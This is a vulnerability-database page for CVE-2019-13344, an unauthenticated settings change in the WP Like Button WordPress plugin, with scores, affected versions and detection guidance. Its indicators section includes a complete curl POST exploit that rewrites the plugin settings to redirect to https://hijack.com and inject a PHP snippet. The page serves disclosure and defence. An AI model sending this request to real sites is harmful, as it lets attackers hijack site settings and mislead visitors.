cbcvebase.
CVE-2019-13344
published 2019-07-05

CVE-2019-13344: An authentication bypass vulnerability in the CRUDLab WP Like Button plugin through 1.6.0 for WordPress allows unauthenticated attackers to change settings…

PriorityP355medium5.3CVSS 3.0
AVNACLPRNUINSUCNILAN
EXPLOIT
EPSS
45.09%
98.6th percentile
An authentication bypass vulnerability in the CRUDLab WP Like Button plugin through 1.6.0 for WordPress allows unauthenticated attackers to change settings. The contains() function in wp_like_button.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update settings, as demonstrated by the wp-admin/admin.php?page=facebook-like-button each_page_url or code_snippet parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
crudlabwp_like_button<= 1.6.0

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1
path/wp-admin/admin.php?page=facebook-like-button
filenamewp_like_button.php
commandcurl -k -i --raw -X POST -d "page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
  • Detect unauthenticated POST requests to the WordPress admin plugin settings page for WP Like Button — any POST to /wp-admin/admin.php?page=facebook-like-button without a valid authenticated session cookie should be flagged as exploitation of CVE-2019-13344.
  • Alert on POST requests containing the parameter 'update_fblb' in the body targeting /wp-admin/admin.php?page=facebook-like-button, which is the trigger parameter used to save settings in the vulnerable plugin.
  • Monitor for the 'code_snippet' POST parameter being set to PHP code (e.g. containing '<?php') in requests to the WP Like Button admin page, which could indicate an attacker injecting arbitrary code via the unauthenticated settings update.
  • The vulnerable code path is the contains() function in wp_like_button.php; source code review or file integrity monitoring of this file can confirm whether the authorization check is absent.
  • ·The vulnerability affects WP Like Button plugin version 1.6.0 and below (including 1.5.0). The vendor released v1.6.0 but did not fix the issue; no patched version was available at time of disclosure. Detections should target all installs up to and including v1.6.0.
  • ·The exploit requires no authentication whatsoever — the POST request does not need any session cookie or nonce, making it trivially exploitable by any unauthenticated remote attacker.

CVSS provenance

nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.